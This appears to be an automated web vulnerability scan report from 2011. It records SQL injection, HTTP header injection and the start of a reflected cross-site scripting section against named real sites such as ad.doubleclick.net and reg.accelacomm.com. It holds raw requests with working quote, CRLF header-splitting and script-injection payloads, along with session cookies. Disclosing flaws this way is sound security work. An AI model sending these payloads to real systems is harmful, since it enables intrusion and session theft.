SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /LoggingAgent/LoggingAgent HTTP/1.1
Host: pixel.yola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q='
<html><head><title>JBossWeb/2.0.1.GA - Error report</title><style><!--H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-se ...[SNIP]... </b> Exception report</p> ...[SNIP]... <u>The full stack trace of the root cause is available in the JBossWeb/2.0.1.GA logs.</u> ...[SNIP]...
Request 2
GET /LoggingAgent/LoggingAgent HTTP/1.1
Host: pixel.yola.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=''
The Script parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the Script parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Request
GET /servlet/Frs.frs?Context=LOGENTRY&Source=csozne&Source_BC=10&Script=/LP/50552781/reg'&_from=cf4cf HTTP/1.1
Host: reg.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://zones.computerworld.com/ncircle/registration.php?from=cf4cf%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E8127f6b53d2&src=csozne&tab=1&item=5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: test_sub_reg=-105b800c:12e634a5162:-1251.90; Svr=svr.regwa2; regid=-105b800c:12e634a5162:-1251.90
Response
HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:18:16 GMT
Set-Cookie: Svr=svr.regwa2; Domain=.accelacomm.com; Expires=Mon, 28-Feb-2011 16:18:16 GMT; Path=/
Set-Cookie: JSESSIONID=08197447BD0819E214C667E4146D292F; Path=/
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Cache-Control: no-cache, no-store, no-transform
Expires: -1
P3P: CP="OTPo OTRo CUR ADMo DEVo PSDo IVAo IVDo UNRo OUR DELo IND PHY ONL COM NAV INT DEM STA OTC"
Connection: close
Content-Length: 1226
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html dir=ltr><head><style>a:link {font:8pt/11pt verdana; color:FF0000}a:visited {font:8pt/11pt verdana; color:#4e4e4e}</style><META NAME="ROB ...[SNIP]... <font style="COLOR:000000; FONT: 8pt/11pt verdana">org.postgresql.util.PSQLException: ERROR: unterminated quoted string at or near "'/LP/50552781/reg''"</font> ...[SNIP]...
The Script parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Script parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be PostgreSQL.
Request 1
GET /servlet/Frs.frs?Context=LOGENTRY&Source=csoznee4778';alert(1)&Source_BC=&Script=/LP/c8ec899850f/reg'&10/50552781/_from=cso HTTP/1.1
Host: reg.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://zones.computerworld.com/ncircle/registration.php?from=cso&src=csoznee4778'%3balert(1)//c8ec899850f&tab=1&item=5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: test_sub_reg=-105b800c:12e634a5162:-1251.90; regid=-105b800c:12e634a5162:-1251.90; JSESSIONID=EC582D1069267246C7FDEB32983056F9; Svr=svr.regwa2; __utma=192604602.318667683.1298902742.1298902742.1298902742.1; __utmb=192604602; __utmc=192604602; __utmz=192604602.1298902742.1.1.utmccn=(referral)|utmcsr=zones.computerworld.com|utmcct=/ncircle/registration.php|utmcmd=referral
Response 1
HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:18:41 GMT
Set-Cookie: Svr=svr.regwa2; Domain=.accelacomm.com; Expires=Mon, 28-Feb-2011 16:18:41 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Cache-Control: no-cache, no-store, no-transform
Expires: -1
P3P: CP="OTPo OTRo CUR ADMo DEVo PSDo IVAo IVDo UNRo OUR DELo IND PHY ONL COM NAV INT DEM STA OTC"
Connection: close
Content-Length: 1232
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html dir=ltr><head><style>a:link {font:8pt/11pt verdana; color:FF0000}a:visited {font:8pt/11pt verdana; color:#4e4e4e}</style><META NAME="ROB ...[SNIP]... <font style="COLOR:000000; FONT: 8pt/11pt verdana">org.postgresql.util.PSQLException: ERROR: unterminated quoted string at or near "'/LP/c8ec899850f/reg''"</font> ...[SNIP]...
Request 2
GET /servlet/Frs.frs?Context=LOGENTRY&Source=csoznee4778';alert(1)&Source_BC=&Script=/LP/c8ec899850f/reg''&10/50552781/_from=cso HTTP/1.1
Host: reg.accelacomm.com
Proxy-Connection: keep-alive
Referer: http://zones.computerworld.com/ncircle/registration.php?from=cso&src=csoznee4778'%3balert(1)//c8ec899850f&tab=1&item=5
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: test_sub_reg=-105b800c:12e634a5162:-1251.90; regid=-105b800c:12e634a5162:-1251.90; JSESSIONID=EC582D1069267246C7FDEB32983056F9; Svr=svr.regwa2; __utma=192604602.318667683.1298902742.1298902742.1298902742.1; __utmb=192604602; __utmc=192604602; __utmz=192604602.1298902742.1.1.utmccn=(referral)|utmcsr=zones.computerworld.com|utmcct=/ncircle/registration.php|utmcmd=referral
Response 2
HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 14:18:41 GMT
Set-Cookie: Svr=svr.regwa2; Domain=.accelacomm.com; Expires=Mon, 28-Feb-2011 16:18:41 GMT; Path=/
Content-Type: text/html; charset=UTF-8
Pragma: no-cache
Cache-Control: no-cache, no-store, no-transform
Expires: -1
P3P: CP="OTPo OTRo CUR ADMo DEVo PSDo IVAo IVDo UNRo OUR DELo IND PHY ONL COM NAV INT DEM STA OTC"
Connection: close
Content-Length: 1168
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html dir=ltr><head><style>a:link {font:8pt/11pt verdana; color:FF0000}a:visited {font:8pt/11pt verdana; color:#4e4e4e}</style><META NAME="ROB ...[SNIP]...
2. HTTP header injection
There are 16 instances of this issue:
HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
The value of REST URL parameter 1 is copied into the Location response header. The payload 27472%0d%0ae6185a58aa2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /27472%0d%0ae6185a58aa2/idge.cso.data_protection/ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/27472
e6185a58aa2/idge.cso.data_protection/:
Date: Mon, 28 Feb 2011 13:29:52 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 3ac51%0d%0a2af670789b9 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /3ac51%0d%0a2af670789b9/idge.cso.zone/module HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/3ac51
2af670789b9/idge.cso.zone/module:
Date: Mon, 28 Feb 2011 13:29:53 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 1d587%0d%0affa1b6bda77 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1d587%0d%0affa1b6bda77/idgt.data.cso/data_collection_cso HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1d587
ffa1b6bda77/idgt.data.cso/data_collection_cso:
Date: Mon, 28 Feb 2011 13:29:53 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 1bfc4%0d%0adf53ec42484 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /1bfc4%0d%0adf53ec42484/N2524.134426.0710433834321/B4169763.43;sz=160x600;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=B_vnzdaprTYuTIpnQlQf2x630A42HpOsB3YCL8hLjqLazM5CJiwQQARgBIMDIgxo4AFDEwrTWBmDJhqOH1KOAEKABo67u9gOyAQ53d3cuYml6ZmluZC51c7oBCjE2MHg2MDBfYXPIAQnaARZodHRwOi8vd3d3LmJpemZpbmQudXMvuAIYwAIFyALl78UYqAMB0QOCjebmy6JxrugD0Sn1AwAAAMQ&num=1&sig=AGiWqtzgratqXpBAo1y1j-ESKutiIL89pQ&client=ca-pub-3033999741136561&adurl=;ord=1568904022? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3033999741136561&output=html&h=600&slotname=5116297667&w=160&lmt=1298923247&flash=10.2.154&url=http%3A%2F%2Fwww.bizfind.us%2F&dt=1298901647316&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298901647336&frm=0&adk=3977642506&ga_vid=1551423665.1298901533&ga_sid=1298901533&ga_hid=200456462&ga_fc=1&u_tz=-360&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=888&bih=923&ref=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221'%2Fabc-development-inc%2Fchicago.aspx%2Fx22&fu=0&ifi=1&dtd=44&xpc=YBWQhJ3iv0&p=http%3A//www.bizfind.us
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
The value of REST URL parameter 1 is copied into the Location response header. The payload 8c7b5%0d%0a9ead5015a16 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /8c7b5%0d%0a9ead5015a16/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BTJZMB7prTerWAaHjlQetkoXABY2HpOsBhaKK8hLjqLazM9DU4wEQARgBIL7O5Q04AFDEwrTWBmDJhqOH1KOAEKABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAThmaWxlOi8vL0M6L1VzZXJzL2NyYXdsZXIvRG9jdW1lbnRzL3d3dy5iaXpmaW5kLnVzXzgwLmh0bbgCGMACBcgC5e_FGKgDAdEDgo3m5suica7oA-UD6APFBugDlAHoA-wF9QMCAADE&num=1&sig=AGiWqtx1NNT9B8_aB2xJuQQNNdNEHXPYJA&client=ca-pub-4063878933780912&adurl=;ord=1422869169? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1298927233&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2FUsers%2Fcrawler%2FDocuments%2Fwww.bizfind.us_80.htm&dt=1298905633613&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298905633634&frm=0&adk=1607234649&ga_vid=228457643.1298905634&ga_sid=1298905634&ga_hid=1950173026&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1116&bih=939&fu=0&ifi=1&dtd=86&xpc=86OwR2A1P4&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
The value of REST URL parameter 1 is copied into the Location response header. The payload 2758b%0d%0af8a74e8199f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /2758b%0d%0af8a74e8199f/N5552.3159.GOOGLECN.COM/B5038686.44 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2758b
f8a74e8199f/N5552.3159.GOOGLECN.COM/B5038686.44:
Date: Mon, 28 Feb 2011 13:29:51 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 48e42%0d%0a28a200d46 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /48e42%0d%0a28a200d46/idge.cso.data_protection/;kw=security,policies,tools,checklists,templates,sample,library,risk;tile=10;pos=bottomimu;sz=336x280,300x250,336x600;tagtype=iframe;cid=486324;author=cso;type=article;referrer=csoonline;compsz=;indust=;empcnt=;ord=4648376342374831? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/48e42
28a200d46/idge.cso.data_protection/;kw=security,policies,tools,checklists,templates,sample,library,risk;tile=10;pos=bottomimu;sz=336x280,300x250,336x600;tagtype=iframe;cid=486324;author=cso;type=article;referrer=csoonline;compsz=;indust=;empcnt=;ord=4648376342374831:
Date: Mon, 28 Feb 2011 12:46:33 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 4b185%0d%0a71e095ee542 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /4b185%0d%0a71e095ee542/idge.cso.zone/;tile=16;pos=bottomleaderboard;sz=728x90;tagtype=iframe;referrer=ncircle;compsz=;indust=;empcnt=;ord=7037695359904319? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4b185
71e095ee542/idge.cso.zone/;tile=16;pos=bottomleaderboard;sz=728x90;tagtype=iframe;referrer=ncircle;compsz=;indust=;empcnt=;ord=7037695359904319:
Date: Mon, 28 Feb 2011 12:44:54 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 17507%0d%0ac0d40e6ce56 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /17507%0d%0ac0d40e6ce56/idge.cso.zone/module;tile=16;pos=bottomleaderboard;sz=728x90;tagtype=iframe;type=module;ord=9537889300845564? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/17507
c0d40e6ce56/idge.cso.zone/module;tile=16;pos=bottomleaderboard;sz=728x90;tagtype=iframe;type=module;ord=9537889300845564:
Date: Mon, 28 Feb 2011 13:19:24 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 4a364%0d%0a570042f383c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /4a364%0d%0a570042f383c/idge.cso.data_protection/;kw=security,policies,tools,checklists,templates,sample,library,risk;tile=5;pos=dogear;dcopt=ist;sz=1x1;cid=486324;author=cso;type=article;referrer=csoonline;compsz=;indust=;empcnt=;ord=4648376342374831? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/article/486324/security-tools-templates-policies
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/4a364
570042f383c/idge.cso.data_protection/;kw=security,policies,tools,checklists,templates,sample,library,risk;tile=5;pos=dogear;dcopt=ist;sz=1x1;cid=486324;author=cso;type=article;referrer=csoonline;compsz=;indust=;empcnt=;ord=4648376342374831:
Date: Mon, 28 Feb 2011 12:46:08 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 57987%0d%0a44140822130 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /57987%0d%0a44140822130/idge.cso.zone/module;tile=6;pos=topimu;sz=336x280,300x250,336x600;type=module;ord=9537889300845564? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://comments.csoonline.com/febf8%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E3a3399f1586/CIO.com/style.css
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/57987
44140822130/idge.cso.zone/module;tile=6;pos=topimu;sz=336x280,300x250,336x600;type=module;ord=9537889300845564:
Date: Mon, 28 Feb 2011 13:19:25 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 34c08%0d%0a75548075a34 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /34c08%0d%0a75548075a34/idgt.data.cso/data_collection_cso;sz=1x1;ord=7037695359904319? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.csoonline.com/solution-centers/ncircle?item=5&tab=1&from=cso&src=csozne
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/34c08
75548075a34/idgt.data.cso/data_collection_cso;sz=1x1;ord=7037695359904319:
Date: Mon, 28 Feb 2011 12:44:58 GMT
Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 6f9c6%0d%0a690d9353619 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /6f9c6%0d%0a690d9353619/idge.cso.data_protection/ HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6f9c6
690d9353619/idge.cso.data_protection/:
Date: Mon, 28 Feb 2011 13:29:53 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 50d48%0d%0adcd5e49237 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /50d48%0d%0adcd5e49237/idge.cso.zone/module HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/50d48
dcd5e49237/idge.cso.zone/module:
Date: Mon, 28 Feb 2011 13:29:54 GMT
Server: GFE/2.0
Connection: close
The value of the O_CREATIVE_ID request parameter is copied into the O_CREATIVE_ID response header. The payload 9b43d%0d%0aa6df4a1c5d was submitted in the O_CREATIVE_ID parameter. This caused a response containing an injected HTTP header.
Request
GET /load/227245/index.html?O_R_NUM=93877455&O_RANK=1&O_CREATIVE_ID=9b43d%0d%0aa6df4a1c5d&O_PPLACEMENT_ID=1&O_SITE_ID=12169& HTTP/1.1
Host: ads1.revenue.net
Proxy-Connection: keep-alive
Referer: http://www.acelacomm.com/?epl=w58VndtRmVfVCfESVTOnHfQfKgdAQuEUyV38Udadr44INDdmKBIgWHLMrp42LeGXWECYgt5kZyVVihOljr0JdwvxYqsLk931uomhCTow3nMU7Ak0sMMEwlM6ISIbV76HxGrNemSgkTaaeogYPUVQY2igNml66qkZTRF1ACAQ3Oe_AADgfgUAAECAWwkAAP2HygFZUyZZQTE2aFpCfwAAAPA
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Train0=.CABJ2OjE6MToxMjE2OToyMjcyNDU6MzQ0MDo5Mzg3NzQ1NToxOjBYAwQ5ODk0MjY1SAGQAQU4OTk0NTA6LSkEAAcxMjk4ODk5NDUwEQAA
Response
HTTP/1.1 200 OK
Date: Mon, 28 Feb 2011 13:24:30 GMT
Server: Oversee Webserver v1.3.20
Vary: Accept-Encoding
Cache-control: private, no-cache, must-revalidate
Pragma: no-cache
P3P: policyref="/w3c/revenue.xml", CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Connection: close
O_CREATIVE_ID: 9b43d
a6df4a1c5d
Content-Type: text/html
Content-Length: 0
The value of REST URL parameter 1 is copied into the Location response header. The payload 288f2%0d%0a2d484208b0e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /288f2%0d%0a2d484208b0e/Process/ID/SignInByAccountNumber HTTP/1.1
Host: idcenter.services.optimum.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 302 Moved Temporarily
Date: Mon, 28 Feb 2011 13:32:33 GMT
Location: http://www.optimum.net/288f2
2d484208b0e/Process/ID/SignInByAccountNumber
Connection: close
<HEAD><META HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=ISO-8859-1"><TITLE>Not Found</TITLE></HEAD> <H1>Not Found</H1> The requested object does not exist on this server. The link you followe ...[SNIP]...
3. Cross-site scripting (reflected)
There are 103 instances of this issue:
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
